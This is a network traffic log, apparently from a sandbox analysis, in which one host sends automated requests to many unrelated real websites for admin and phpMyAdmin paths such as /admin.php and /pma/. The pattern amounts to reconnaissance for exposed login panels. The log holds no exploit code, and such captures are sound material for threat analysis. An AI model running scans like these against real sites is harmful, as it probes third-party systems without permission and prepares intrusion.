Feb 21, 2024 00:26:20.179930925 CET	484	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:20 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 60 Connection: keep-alive cache-control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Frame-Options: DENY Content-Security-Policy: script-src 'self' Location: https://protonmail.com/de/ Vary: Accept Data Raw: 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 70 72 6f 74 6f 6e 6d 61 69 6c 2e 63 6f 6d 2f 64 65 2f Data Ascii: Moved Permanently. Redirecting to https://protonmail.com/de/

Session ID	Source IP	Source Port	Destination IP	Destination Port
490	192.168.2.6	56572	75.2.70.75	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:20.031337976 CET	166	OUT	GET /admin HTTP/1.1 Host: eyegage.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:20.128746033 CET	344	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:20 GMT Content-Type: text/html Content-Length: 166 Connection: keep-alive Location: https://eyegage.com/admin Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>
Feb 21, 2024 00:26:20.336597919 CET	344	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:20 GMT Content-Type: text/html Content-Length: 166 Connection: keep-alive Location: https://eyegage.com/admin Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
491	192.168.2.6	56568	85.13.138.112	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:20.116828918 CET	166	OUT	GET /admin/ HTTP/1.1 Host: popular.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:20.292670012 CET	423	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:20 GMT Server: Apache Location: https://popular.de/admin/ Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 6f 70 75 6c 61 72 2e 64 65 2f 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://popular.de/admin/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
492	192.168.2.6	57039	188.40.92.90	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:20.429403067 CET	163	OUT	GET /admin/ HTTP/1.1 Host: joaz.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:20.606143951 CET	139	IN	HTTP/1.1 302 Found Location: https://www.domainmarkt.de/joaz.de Server: Caddy Date: Tue, 20 Feb 2024 23:26:20 GMT Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
493	192.168.2.6	57154	217.26.61.200	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:20.479129076 CET	168	OUT	GET /admin.php HTTP/1.1 Host: eskimo.ch Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:20.665067911 CET	427	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:20 GMT Server: Apache Location: https://eskimo.ch/admin.php Content-Length: 235 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 73 6b 69 6d 6f 2e 63 68 2f 61 64 6d 69 6e 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://eskimo.ch/admin.php">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
494	192.168.2.6	57177	13.232.255.130	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:20.878643036 CET	180	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: amsantechnology.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:21.155772924 CET	415	IN	HTTP/1.1 302 Found Date: Tue, 20 Feb 2024 23:26:21 GMT Server: Apache Location: https://amsantechnology.com/phpMyAdmin/ Content-Length: 223 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 73 61 6e 74 65 63 68 6e 6f 6c 6f 67 79 2e 63 6f 6d 2f 70 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://amsantechnology.com/phpMyAdmin/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
495	192.168.2.6	57447	20.75.101.58	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:20.880709887 CET	169	OUT	GET /admin.php HTTP/1.1 Host: att.com.sg Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:20.982496023 CET	530	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:20 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 234 Connection: keep-alive Server: Apache/2.4.6 (Red Hat Enterprise Linux) x-frame-options: DENY Cache-Control: no-store Location: http://www.corp.att.com/ap Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 6f 72 70 2e 61 74 74 2e 63 6f 6d 2f 61 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.corp.att.com/ap">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
496	192.168.2.6	57565	20.75.101.58	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:21.622252941 CET	164	OUT	GET /pma/ HTTP/1.1 Host: att.com.sg Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:21.726423025 CET	530	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:21 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 234 Connection: keep-alive Server: Apache/2.4.6 (Red Hat Enterprise Linux) x-frame-options: DENY Cache-Control: no-store Location: http://www.corp.att.com/ap Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 6f 72 70 2e 61 74 74 2e 63 6f 6d 2f 61 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.corp.att.com/ap">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
497	192.168.2.6	57277	223.29.45.10	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:21.638139963 CET	187	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: www.shinko-kensetsu.eei.jp Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:21.913885117 CET	457	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:21 GMT Server: Apache Location: https://shinko-kensetsu.eei.jp/PhpMyAdmin/ Content-Length: 250 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 68 69 6e 6b 6f 2d 6b 65 6e 73 65 74 73 75 2e 65 65 69 2e 6a 70 2f 50 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://shinko-kensetsu.eei.jp/PhpMyAdmin/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
498	192.168.2.6	57762	213.186.33.5	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:21.783807993 CET	170	OUT	GET /admin HTTP/1.1 Host: pharmacie-vp.fr Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:21.943967104 CET	458	IN	HTTP/1.1 302 Moved Temporarily server: nginx date: Tue, 20 Feb 2024 23:26:21 GMT content-type: text/html content-length: 138 location: http://imp.ovh.net x-iplb-request-id: BF60E3DE:E1A2_D5BA2105:0050_65D5351D_86560BE:3720 x-iplb-instance: 52243 set-cookie: SERVERID77446=200177\|ZdU1I\|ZdU1I; path=/; HttpOnly Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
499	192.168.2.6	57908	185.230.63.186	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:21.811973095 CET	175	OUT	GET /admin HTTP/1.1 Host: montessorihawaii.org Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:21.945343018 CET	657	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:21 GMT Content-Length: 0 Connection: keep-alive location: https://www.montessorihawaii.org/admin strict-transport-security: max-age=3600 Age: 4 Server-Timing: cache;desc=hit, varnish;desc=hit, dc;desc=42 X-Seen-By: vmPhUNXuQemvc7fjBI8NWewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLs+OLeQjje20lehfeSK9Q34a0sM5c8dDUFHeNaFq0qDu,2d58ifebGbosy5xc+FRaltGKI8H22L5ehnxAHTgi0jXiBBU5/iors8IBQRDtyEy3n06Gs5ll40W7FlvUwomFCQ==,2UNV7KOq4oGjA5+PKsX47Ad3BAkeAb9lWxcyN70+/DFYgeUJqUXtid+86vZww+nL Cache-Control: no-cache X-Wix-Request-Id: 1708471581.852147420827715885 X-Content-Type-Options: nosniff

Session ID	Source IP	Source Port	Destination IP	Destination Port
500	192.168.2.6	57909	45.147.96.4	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:21.893021107 CET	175	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: glazing-bt.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:22.064090014 CET	409	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 20 Feb 2024 23:26:21 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://glazing-bt.com/PhpMyAdmin/ Strict-Transport-Security: max-age=31536000 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
501	192.168.2.6	57951	81.169.145.86	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:21.928944111 CET	170	OUT	GET /pma/ HTTP/1.1 Host: ksv-schwimmen.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:22.108407974 CET	445	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:22 GMT Server: Apache/2.4.58 (Unix) Location: https://ksv-schwimmen.de/pma/ Content-Length: 237 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 73 76 2d 73 63 68 77 69 6d 6d 65 6e 2e 64 65 2f 70 6d 61 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://ksv-schwimmen.de/pma/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
502	192.168.2.6	57928	185.39.146.199	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:21.934721947 CET	165	OUT	GET /pma/ HTTP/1.1 Host: markoren.no Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:22.122129917 CET	102	IN	HTTP/1.1 302 Found content-length: 0 location: https://markoren.no/pma/ cache-control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
503	192.168.2.6	57980	81.169.145.86	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:21.940304041 CET	190	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: creativ-moebelwerkstaetten.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:22.119820118 CET	485	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:22 GMT Server: Apache/2.4.58 (Unix) Location: https://creativ-moebelwerkstaetten.de/phpMyAdmin/ Content-Length: 257 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 72 65 61 74 69 76 2d 6d 6f 65 62 65 6c 77 65 72 6b 73 74 61 65 74 74 65 6e 2e 64 65 2f 70 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://creativ-moebelwerkstaetten.de/phpMyAdmin/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
504	192.168.2.6	57757	217.160.0.179	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:21.947443008 CET	168	OUT	GET /admin.php HTTP/1.1 Host: upblue.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:25.398222923 CET	565	IN	HTTP/1.1 200 OK Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=15 Date: Tue, 20 Feb 2024 23:26:25 GMT Server: Apache Content-Encoding: gzip Data Raw: 31 36 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 91 4f 4f 84 30 10 c5 ef 26 7e 87 b1 89 47 18 c8 7a 30 4a 39 b8 7f a2 c9 aa 1b c3 46 3d 76 69 57 88 40 6b 29 b2 eb a7 97 76 8b ee c5 44 2e 6d 27 6f 66 7e ef 91 9c cd 1e a7 d9 eb 6a 0e 85 a9 2b 58 ad 6f 96 77 53 20 01 e2 f3 64 8a 38 cb 66 f0 72 9b dd 2f 21 0e 23 58 68 56 8b 56 18 c4 f9 03 01 52 18 a3 ae 10 fb be 0f fb 49 28 f5 1b 66 4f b8 b3 73 62 db e8 af c1 d6 77 85 dc 70 92 9e 9e 24 56 e1 4e c1 b8 3d 4d 69 2a 91 76 0a 36 55 27 12 3c 3c 87 7a 2d 0c 83 66 58 49 c9 bb d8 f7 52 f3 96 40 2e 1b 23 1a 43 09 01 b4 cd 47 22 2e da 5c 97 ca 94 b2 f9 43 67 89 03 f1 d1 95 9f 94 f8 41 81 d9 2b 71 24 37 62 67 d0 12 5e 43 5e 30 3d b8 a5 eb 6c 11 5c fa 75 58 78 e8 d1 15 68 d9 b7 94 c4 51 74 ee cc b9 3a b4 3a a7 2e 9f 76 08 a8 53 d6 58 78 51 95 35 0b b9 40 64 bc 2e 9b 50 15 8a 80 33 4b 89 37 4f c0 b5 6f 06 ab 42 53 12 11 68 a4 16 6d f9 35 44 30 de 88 b3 dd c8 03 80 8d 60 23 f9 de e5 19 ff 86 58 c4 b6 a2 d2 84 41 a1 c5 f6 5f 30 a9 ff a1 9e 77 20 fd 01 4d 90 a5 60 bf 04 95 1d 8c e3 4e 3c 06 c1 31 14 27 b1 21 a6 df d2 7e 6f 3a 60 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 164OO0&~Gz0J9F=viW@k)vD.m'of~j+XowS d8fr/!#XhVVRI(fOsbwp$VN=Mi*v6U'<<z-fXIR@.#CG".\CgA+q$7bg^C^0=l\uXxhQt::.vSXxQ5@d.P3K7OoBShm5D0`#XA_0w M`N<1'!~o:`0

Session ID	Source IP	Source Port	Destination IP	Destination Port
505	192.168.2.6	57976	3.33.139.32	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:21.948302984 CET	172	OUT	GET /admin.php HTTP/1.1 Host: protonmail.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
